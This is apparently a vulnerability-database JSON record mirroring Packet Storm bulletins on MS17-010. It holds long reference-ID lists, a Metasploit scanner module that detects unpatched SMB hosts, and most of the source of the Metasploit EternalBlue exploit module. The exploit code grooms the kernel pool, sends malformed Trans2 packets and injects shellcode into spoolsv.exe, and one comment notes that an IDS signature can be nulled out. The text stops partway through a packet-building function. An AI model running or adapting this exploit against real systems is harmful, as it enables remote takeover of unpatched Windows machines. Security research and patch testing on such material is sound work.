["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"]}, {"type": "packetstorm", "idList": 
["PACKETSTORM:156196", "PACKETSTORM:146236", "PACKETSTORM:142548", "PACKETSTORM:154690"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-29702", "1337DAY-ID-27613"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE"]}, {"type": "nessus", "idList": ["700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM", "MS17-010.NASL"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:47456", "EDB-ID:43970"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0145", "CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0143", "CVE-2017-0147", "CVE-2017-0146"]}, {"type": "symantec", "idList": ["SMNTC-96706", "SMNTC-96703", "SMNTC-96705", "SMNTC-96709", "SMNTC-96704", "SMNTC-96707"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0177", "CPAI-2017-0198", "CPAI-2017-0203", "CPAI-2017-0205", "CPAI-2017-0419", "CPAI-2017-0200"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "threatpost", "idList": 
["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591"]}, {"type": "mmpc", "idList": ["MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:89789F73D15A0B331512F90F7E692851"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0143", "MS:CVE-2017-0145"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2017-04-18T01:24:55", "rev": 2}}, "objectVersion": "1.5", "sourceHref": "https://packetstormsecurity.com/files/download/142181/mswinsmb-exec.rb.txt", "sourceData": "`## \n# This module requires Metasploit: http://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \n# auxiliary/scanner/smb/smb_ms_17_010 \n \nrequire 'msf/core' \n \nclass MetasploitModule < Msf::Auxiliary \n \ninclude Msf::Exploit::Remote::SMB::Client \ninclude 
Msf::Exploit::Remote::SMB::Client::Authenticated \n \ninclude Msf::Auxiliary::Scanner \ninclude Msf::Auxiliary::Report \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'MS17-010 SMB RCE Detection', \n'Description' => %q{ \nUses information disclosure to determine if MS17-010 has been patched or not. \nSpecifically, it connects to the IPC$ tree and attempts a transaction on FID 0. \nIf the status returned is \"STATUS_INSUFF_SERVER_RESOURCES\", the machine does \nnot have the MS17-010 patch. \n \nThis module does not require valid SMB credentials in default server \nconfigurations. It can log on as the user \"\\\" and connect to IPC$. \n}, \n'Author' => [ 'Sean Dillon <sean.dillon@risksense.com>' ], \n'References' => \n[ \n[ 'CVE', '2017-0143'], \n[ 'CVE', '2017-0144'], \n[ 'CVE', '2017-0145'], \n[ 'CVE', '2017-0146'], \n[ 'CVE', '2017-0147'], \n[ 'CVE', '2017-0148'], \n[ 'MSB', 'MS17-010'], \n[ 'URL', 'https://technet.microsoft.com/en-us/library/security/ms17-010.aspx'] \n], \n'License' => MSF_LICENSE \n)) \nend \n \ndef run_host(ip) \nbegin \nstatus = do_smb_probe(ip) \n \nif status == \"STATUS_INSUFF_SERVER_RESOURCES\" \nprint_warning(\"Host is likely VULNERABLE to MS17-010!\") \nreport_vuln( \nhost: ip, \nname: self.name, \nrefs: self.references, \ninfo: 'STATUS_INSUFF_SERVER_RESOURCES for FID 0 against IPC$' \n) \nelsif status == \"STATUS_ACCESS_DENIED\" or status == \"STATUS_INVALID_HANDLE\" \n# STATUS_ACCESS_DENIED (Windows 10) and STATUS_INVALID_HANDLE (others) \nprint_good(\"Host does NOT appear vulnerable.\") \nelse \nprint_bad(\"Unable to properly detect if host is vulnerable.\") \nend \n \nrescue ::Interrupt \nprint_status(\"Exiting on interrupt.\") \nraise $! 
\nrescue ::Rex::Proto::SMB::Exceptions::LoginError \nprint_error(\"An SMB Login Error occurred while connecting to the IPC$ tree.\") \nrescue ::Exception => e \nvprint_error(\"#{e.class}: #{e.message}\") \nensure \ndisconnect \nend \nend \n \ndef do_smb_probe(ip) \nconnect \n \n# logon as user \\ \nsimple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain']) \n \n# connect to IPC$ \nipc_share = \"\\\\\\\\#{ip}\\\\IPC$\" \nsimple.connect(ipc_share) \ntree_id = simple.shares[ipc_share] \n \nprint_status(\"Connected to #{ipc_share} with TID = #{tree_id}\") \n \n# request transaction with fid = 0 \npkt = make_smb_trans_ms17_010(tree_id) \nsock.put(pkt) \nbytes = sock.get_once \n \n# convert packet to response struct \npkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct \npkt.from_s(bytes[4..-1]) \n \n# convert error code to string \ncode = pkt['SMB'].v['ErrorClass'] \nsmberr = Rex::Proto::SMB::Exceptions::ErrorCode.new \nstatus = smberr.get_error(code) \n \nprint_status(\"Received #{status} with FID = 0\") \nstatus \nend \n \ndef make_smb_trans_ms17_010(tree_id) \n# make a raw transaction packet \npkt = Rex::Proto::SMB::Constants::SMB_TRANS_PKT.make_struct \nsimple.client.smb_defaults(pkt['Payload']['SMB']) \n \n# opcode 0x23 = PeekNamedPipe, fid = 0 \nsetup = \"\\x23\\x00\\x00\\x00\" \nsetup_count = 2 # 2 words \ntrans = \"\\\\PIPE\\\\\\x00\" \n \n# calculate offsets to the SetupData payload \nbase_offset = pkt.to_s.length + (setup.length) - 4 \nparam_offset = base_offset + trans.length \ndata_offset = param_offset # + 0 \n \n# packet baselines \npkt['Payload']['SMB'].v['Command'] = Rex::Proto::SMB::Constants::SMB_COM_TRANSACTION \npkt['Payload']['SMB'].v['Flags1'] = 0x18 \npkt['Payload']['SMB'].v['Flags2'] = 0x2801 # 0xc803 would unicode \npkt['Payload']['SMB'].v['TreeID'] = tree_id \npkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count \npkt['Payload'].v['ParamCountMax'] = 0xffff 
\npkt['Payload'].v['DataCountMax'] = 0xffff \npkt['Payload'].v['ParamOffset'] = param_offset \npkt['Payload'].v['DataOffset'] = data_offset \n \n# actual magic: PeekNamedPipe FID=0, \\PIPE\\ \npkt['Payload'].v['SetupCount'] = setup_count \npkt['Payload'].v['SetupData'] = setup \npkt['Payload'].v['Payload'] = trans \n \npkt.to_s \nend \nend \n \n \n`\n", "_object_type": "robots.models.packetstorm.PacketstormBulletin", "_object_types": ["robots.models.packetstorm.PacketstormBulletin", "robots.models.base.Bulletin"], "immutableFields": [], "cvss2": {}, "cvss3": {}}, {"id": "PACKETSTORM:142548", "hash": "72bc350713947bf4c9b0d12ead6b098a", "type": "packetstorm", "bulletinFamily": "exploit", "title": "MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption", "description": "", "published": "2017-05-17T00:00:00", "modified": "2017-05-17T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://packetstormsecurity.com/files/142548/MS17-010-EternalBlue-SMB-Remote-Windows-Kernel-Pool-Corruption.html", "reporter": "Sean Dillon", "references": [], "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "lastseen": "2017-05-17T05:27:20", "history": [], "viewCount": 3221, "enchantments": {"score": {"value": 7.8, "vector": "NONE", "modified": "2017-05-17T05:27:20", "rev": 2}, "dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:142181", "PACKETSTORM:146236", "PACKETSTORM:154690"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-27786"]}, {"type": 
"f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "700099.PRM", "700059.PRM", "MS17-010.NASL"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0144", "CVE-2017-0143", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0145"]}, {"type": "symantec", "idList": ["SMNTC-96704", "SMNTC-96703", "SMNTC-96706", "SMNTC-96707", "SMNTC-96705", "SMNTC-96709"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0205", "CPAI-2017-0203", "CPAI-2017-0177", "CPAI-2017-0419", "CPAI-2017-0200", "CPAI-2017-0198"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", 
"TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0145", "MS:CVE-2017-0148"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2017-05-17T05:27:20", "rev": 2}}, "objectVersion": "1.5", "sourceHref": "https://packetstormsecurity.com/files/download/142548/ms17_010_eternalblue.rb.txt", "sourceData": "`## \n# This module requires Metasploit: http://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'ruby_smb' \nrequire 'ruby_smb/smb1/packet' \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank 
= GoodRanking \n \ninclude Msf::Exploit::Remote::Tcp \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption', \n'Description' => %q{ \nThis module is a port of the Equation Group ETERNALBLUE exploit, part of \nthe FuzzBunch toolkit released by Shadow Brokers. \n \nThere is a buffer overflow memmove operation in Srv!SrvOs2FeaToNt. The size \nis calculated in Srv!SrvOs2FeaListSizeToNt, with mathematical error where a \nDWORD is subtracted into a WORD. The kernel pool is groomed so that overflow \nis well laid-out to overwrite an SMBv1 buffer. Actual RIP hijack is later \ncompleted in srvnet!SrvNetWskReceiveComplete. \n \nThis exploit, like the original may not trigger 100% of the time, and should be \nrun continuously until triggered. It seems like the pool will get hot streaks \nand need a cool down period before the shells rain in again. \n}, \n \n'Author' => [ \n'Sean Dillon <sean.dillon@risksense.com>', # @zerosum0x0 \n'Dylan Davis <dylan.davis@risksense.com>', # @jennamagius \n'Equation Group', \n'Shadow Brokers' \n], \n'License' => MSF_LICENSE, \n'References' => \n[ \n[ 'MSB', 'MS17-010' ], \n[ 'CVE', '2017-0143' ], \n[ 'CVE', '2017-0144' ], \n[ 'CVE', '2017-0145' ], \n[ 'CVE', '2017-0146' ], \n[ 'CVE', '2017-0147' ], \n[ 'CVE', '2017-0148' ], \n[ 'URL', 'https://github.com/RiskSense-Ops/MS17-010' ] \n], \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'thread', \n}, \n'Privileged' => true, \n'Payload' => \n{ \n'Space' => 2000, # this can be more, needs to be recalculated \n'EncoderType' => Msf::Encoder::Type::Raw, \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n[ 'Windows 7 and Server 2008 (x64) All Service Packs', \n{ \n'Platform' => 'win', \n'Arch' => [ ARCH_X64 ], \n \n'ep_thl_b' => 0x308, # EPROCESS.ThreadListHead.Blink offset \n'et_alertable' => 0x4c, # ETHREAD.Alertable offset \n'teb_acp' => 0x2c8, # TEB.ActivationContextPointer offset \n'et_tle' => 0x420 # ETHREAD.ThreadListEntry 
offset \n} \n], \n], \n'DefaultTarget' => 0, \n'DisclosureDate' => 'Mar 14 2017' \n)) \n \nregister_options( \n[ \nOpt::RPORT(445), \nOptString.new('ProcessName', [ true, 'Process to inject payload into.', 'spoolsv.exe' ]), \nOptInt.new( 'MaxExploitAttempts', [ true, \"The number of times to retry the exploit.\", 3 ] ), \nOptInt.new( 'GroomAllocations', [ true, \"Initial number of times to groom the kernel pool.\", 12 ] ), \nOptInt.new( 'GroomDelta', [ true, \"The amount to increase the groom count by per try.\", 5 ] ) \n]) \nend \n \ndef check \n# todo: create MS17-010 mixin, and hook up auxiliary/scanner/smb/smb_ms17_010 \nend \n \ndef exploit \nbegin \nfor i in 1..datastore['MaxExploitAttempts'] \n \ngrooms = datastore['GroomAllocations'] + datastore['GroomDelta'] * (i - 1) \n \nsmb_eternalblue(datastore['ProcessName'], grooms) \n \n# we don't need this sleep, and need to find a way to remove it \n# problem is session_count won't increment until stage is complete :\\ \nsecs = 0 \nwhile !session_created? and secs < 5 \nsecs += 1 \nsleep 1 \nend \n \nif session_created? 
\nprint_good(\"=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\") \nprint_good(\"=-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\") \nprint_good(\"=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\") \nbreak \nelse \nprint_bad(\"=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\") \nprint_bad(\"=-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\") \nprint_bad(\"=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\") \nend \nend \n \nrescue ::RubySMB::Error::UnexpectedStatusCode, \n::Errno::ECONNRESET, \n::Rex::HostUnreachable, \n::Rex::ConnectionTimeout, \n::Rex::ConnectionRefused => e \nprint_bad(\"#{e.class}: #{e.message}\") \nrescue => error \nprint_bad(error.class.to_s) \nprint_bad(error.message) \nprint_bad(error.backtrace.join(\"\\n\")) \nensure \n# pass \nend \nend \n \n# \n# Increase the default delay by five seconds since some kernel-mode \n# payloads may not run immediately. \n# \ndef wfs_delay \nsuper + 5 \nend \n \ndef smb_eternalblue(process_name, grooms) \nbegin \n# Step 0: pre-calculate what we can \nshellcode = make_kernel_user_payload(payload.encode, 0, 0, 0, 0, 0) \npayload_hdr_pkt = make_smb2_payload_headers_packet \npayload_body_pkt = make_smb2_payload_body_packet(shellcode) \n \n# Step 1: Connect to IPC$ share \nprint_status(\"Connecting to target for exploitation.\") \nclient, tree, sock = smb1_anonymous_connect_ipc() \nprint_good(\"Connection established for exploitation.\") \n \nprint_status(\"Trying exploit with #{grooms} Groom Allocations.\") \n \n# Step 2: Create a large SMB1 buffer \nprint_status(\"Sending all but last fragment of exploit packet\") \nsmb1_large_buffer(client, tree, sock) \n \n# Step 3: Groom the pool with payload packets, and open/close SMB1 packets \nprint_status(\"Starting non-paged pool grooming\") \n \n# initialize_groom_threads(ip, port, payload, grooms) \nfhs_sock = smb1_free_hole(true) \n \n@groom_socks = [] \n \nprint_good(\"Sending SMBv2 
buffers\") \nsmb2_grooms(grooms, payload_hdr_pkt) \n \nfhf_sock = smb1_free_hole(false) \n \nprint_good(\"Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.\") \nfhs_sock.shutdown() \n \nprint_status(\"Sending final SMBv2 buffers.\") # 6x \nsmb2_grooms(6, payload_hdr_pkt) # todo: magic # \n \nfhf_sock.shutdown() \n \nprint_status(\"Sending last fragment of exploit packet!\") \nfinal_exploit_pkt = make_smb1_trans2_exploit_packet(tree.id, client.user_id, :eb_trans2_exploit, 15) \nsock.put(final_exploit_pkt) \n \nprint_status(\"Receiving response from exploit packet\") \ncode, raw = smb1_get_response(sock) \n \nif code == 0xc000000d #STATUS_INVALID_PARAMETER (0xC000000D) \nprint_good(\"ETERNALBLUE overwrite completed successfully (0xC000000D)!\") \nend \n \n# Step 4: Send the payload \nprint_status(\"Sending egg to corrupted connection.\") \n \n@groom_socks.each{ |gsock| gsock.put(payload_body_pkt.first(2920)) } \n@groom_socks.each{ |gsock| gsock.put(payload_body_pkt[2920..(4204 - 0x84)]) } \n \nprint_status(\"Triggering free of corrupted buffer.\") \n# tree disconnect \n# logoff and x \n# note: these aren't necessary, just close the sockets \n \nensure \nabort_sockets \nend \nend \n \ndef smb2_grooms(grooms, payload_hdr_pkt) \ngrooms.times do |groom_id| \ngsock = connect(false) \n@groom_socks << gsock \ngsock.put(payload_hdr_pkt) \nend \nend \n \ndef smb1_anonymous_connect_ipc() \nsock = connect(false) \ndispatcher = RubySMB::Dispatcher::Socket.new(sock) \nclient = RubySMB::Client.new(dispatcher, smb1: true, smb2: false, username: '', password: '') \nclient.negotiate \n \npkt = make_smb1_anonymous_login_packet \nsock.put(pkt) \n \ncode, raw, response = smb1_get_response(sock) \n \nunless code == 0 # WindowsError::NTStatus::STATUS_SUCCESS \nraise RubySMB::Error::UnexpectedStatusCode, \"Error with anonymous login\" \nend \n \nclient.user_id = response.uid \n \ntree = client.tree_connect(\"\\\\\\\\#{datastore['RHOST']}\\\\IPC$\") \n \nreturn client, 
tree, sock \nend \n \ndef smb1_large_buffer(client, tree, sock) \nnt_trans_pkt = make_smb1_nt_trans_packet(tree.id, client.user_id) \n \n# send NT Trans \nvprint_status(\"Sending NT Trans Request packet\") \nsock.put(nt_trans_pkt) \n \nvprint_status(\"Receiving NT Trans packet\") \nraw = sock.get_once \n \n# Initial Trans2 request \ntrans2_pkt_nulled = make_smb1_trans2_exploit_packet(tree.id, client.user_id, :eb_trans2_zero, 0) \n \n# send all but last packet \nfor i in 1..14 \ntrans2_pkt_nulled << make_smb1_trans2_exploit_packet(tree.id, client.user_id, :eb_trans2_buffer, i) \nend \n \ntrans2_pkt_nulled << make_smb1_echo_packet(tree.id, client.user_id) \n \nvprint_status(\"Sending malformed Trans2 packets\") \nsock.put(trans2_pkt_nulled) \n \nsock.get_once \nend \n \ndef smb1_free_hole(start) \nsock = connect(false) \ndispatcher = RubySMB::Dispatcher::Socket.new(sock) \nclient = RubySMB::Client.new(dispatcher, smb1: true, smb2: false, username: '', password: '') \nclient.negotiate \n \npkt = \"\" \n \nif start \nvprint_status(\"Sending start free hole packet.\") \npkt = make_smb1_free_hole_session_packet(\"\\x07\\xc0\", \"\\x2d\\x01\", \"\\xf0\\xff\\x00\\x00\\x00\") \nelse \nvprint_status(\"Sending end free hole packet.\") \npkt = make_smb1_free_hole_session_packet(\"\\x07\\x40\", \"\\x2c\\x01\", \"\\xf8\\x87\\x00\\x00\\x00\") \nend \n \n#dump_packet(pkt) \nsock.put(pkt) \n \nvprint_status(\"Receiving free hole response.\") \nsock.get_once \n \nreturn sock \nend \n \ndef smb1_get_response(sock) \nraw = sock.get_once \nresponse = RubySMB::SMB1::SMBHeader.read(raw[4..-1]) \ncode = response.nt_status \nreturn code, raw, response \nend \n \ndef make_smb2_payload_headers_packet \n# don't need a library here, the packet is essentially nonsensical \npkt = \"\" \npkt << \"\\x00\" # session message \npkt << \"\\x00\\xff\\xf7\" # size \npkt << \"\\xfeSMB\" # SMB2 \npkt << \"\\x00\" * 124 \n \npkt \nend \n \ndef make_smb2_payload_body_packet(kernel_user_payload) \n# 
precalculated lengths \npkt_max_len = 4204 \npkt_setup_len = 497 \npkt_max_payload = pkt_max_len - pkt_setup_len # 3575 \n \n# this packet holds padding, KI_USER_SHARED_DATA addresses, and shellcode \npkt = \"\" \n \n# padding \npkt << \"\\x00\" * 0x8 \npkt << \"\\x03\\x00\\x00\\x00\" \npkt << \"\\x00\" * 0x1c \npkt << \"\\x03\\x00\\x00\\x00\" \npkt << \"\\x00\" * 0x74 \n \n# KI_USER_SHARED_DATA addresses \npkt << \"\\xb0\\x00\\xd0\\xff\\xff\\xff\\xff\\xff\" * 2 # x64 address \npkt << \"\\x00\" * 0x10 \npkt << \"\\xc0\\xf0\\xdf\\xff\" * 2 # x86 address \npkt << \"\\x00\" * 0xc4 \n \n# payload addreses \npkt << \"\\x90\\xf1\\xdf\\xff\" \npkt << \"\\x00\" * 0x4 \npkt << \"\\xf0\\xf1\\xdf\\xff\" \npkt << \"\\x00\" * 0x40 \n \npkt << \"\\xf0\\x01\\xd0\\xff\\xff\\xff\\xff\\xff\" \npkt << \"\\x00\" * 0x8 \npkt << \"\\x00\\x02\\xd0\\xff\\xff\\xff\\xff\\xff\" \npkt << \"\\x00\" \n \npkt << kernel_user_payload \n \n# fill out the rest, this can be randomly generated \npkt << \"\\x00\" * (pkt_max_payload - kernel_user_payload.length) \n \npkt \nend \n \ndef make_smb1_echo_packet(tree_id, user_id) \npkt = \"\" \npkt << \"\\x00\" # type \npkt << \"\\x00\\x00\\x31\" # len = 49 \npkt << \"\\xffSMB\" # SMB1 \npkt << \"\\x2b\" # Echo \npkt << \"\\x00\\x00\\x00\\x00\" # Success \npkt << \"\\x18\" # flags \npkt << \"\\x07\\xc0\" # flags2 \npkt << \"\\x00\\x00\" # PID High \npkt << \"\\x00\\x00\\x00\\x00\" # Signature1 \npkt << \"\\x00\\x00\\x00\\x00\" # Signature2 \npkt << \"\\x00\\x00\" # Reserved \npkt << [tree_id].pack(\"S>\") # Tree ID \npkt << \"\\xff\\xfe\" # PID \npkt << [user_id].pack(\"S>\") # UserID \npkt << \"\\x40\\x00\" # MultiplexIDs \n \npkt << \"\\x01\" # Word count \npkt << \"\\x01\\x00\" # Echo count \npkt << \"\\x0c\\x00\" # Byte count \n \n# echo data \n# this is an existing IDS signature, and can be nulled out \n#pkt << \"\\x4a\\x6c\\x4a\\x6d\\x49\\x68\\x43\\x6c\\x42\\x73\\x72\\x00\" \npkt << \"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x00\" \n 
